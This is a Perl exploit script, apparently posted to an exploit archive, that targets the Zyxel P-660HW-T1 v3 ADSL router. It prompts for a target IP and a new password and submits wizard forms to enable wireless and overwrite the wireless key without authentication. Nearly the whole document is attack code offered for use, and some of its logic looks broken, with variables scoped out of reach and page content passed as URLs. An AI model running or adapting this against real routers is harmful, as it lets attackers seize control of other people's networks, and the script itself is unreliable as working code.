#!/usr/bin/perl
###########################################################
# Title : Zyxel P-660HW-TI V3 ADSL CSRF ( change password )
# Author : dr-iman/GIST
# Exploit Type : Perl/Remote
# Date : 3 Feb 2018
# Vendor : https://www.zyxel.com/support/DownloadLandingSR.shtml?c=gb&l=en&kbid=MD08229&md=P-660HW-T1%20v3
# Tested : Ubuntu - Windows 10
# GIST : c0d3!nj3ct!0n , REX , 0r0b4s , Mownten , AliZombie , MR.Python , Phoen1X
###########################################################
# Zyxel P-660HW-T1 v3 Wireless ADSL Have CSRF Vuln.We can Remotly Change Password Wireless.
# The reason for this vulnerability Is After entering the address (change the password) System Will Not Checked Te Password Field
# Items needed : Wirelesss ADSL IP , NeW Password
# There Is 3 Update For This ADSL Router . All versions are vulnerable

use LWP::Simple;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
use HTTP::Request::Common qw(GET);
use IO::Socket;
my $ua = LWP::UserAgent->new;

system(($^O eq 'MSWin32') ? 'cls' : 'clear');

print <<logo;
 _____             _    _____         _     _ _           
|__   |_ _ _ _ ___| |  |   __|_ _ ___| |___|_| |_ ___ ___ 
|   __| | |_'_| -_| |  |   __|_'_| . | | . | |  _| -_|  _|
|_____|_  |_,_|___|_|  |_____|_,_|  _|_|___|_|_| |___|_|  
      |___|                      |_|                      
logo


print "\nEner IP Address : ";
$ip=<>;
chomp($ip);

print "\nEnter New Passwword : ";
$pass=<>;
chomp($pass);

$url = "$ip/wzPPP.html";
my $content = $ua->get("$url")->content;
if ($content =~ /Internet Configuration/ )
{
my $wan = $ua->post($url, Content => [ 'next >' => 'submit',]);
}

my $content = $ua->get("$wan")->content;
my $wan2 = $ua->post($content, Content => [ 'wzEnableWLAN' => 'WLANACtive', 'next >' => 'submit',]);

my $content = $ua->get("$wan2")->content;
my $lan = $ua->post($content, Content => [ 'wzWLANCfgHPSK' => $pass, 'next >' => 'submit',]);


my $content = $ua->get("$lan")->content;
my $fin = $ua->post($content, Content => [ 'Apply' => 'submit',]);

if ($fin =~ /Congratulations/)
{
print "\nPassword Changed Successfully !\n";
}
else{
print "\nProcess Failed !!\n";
}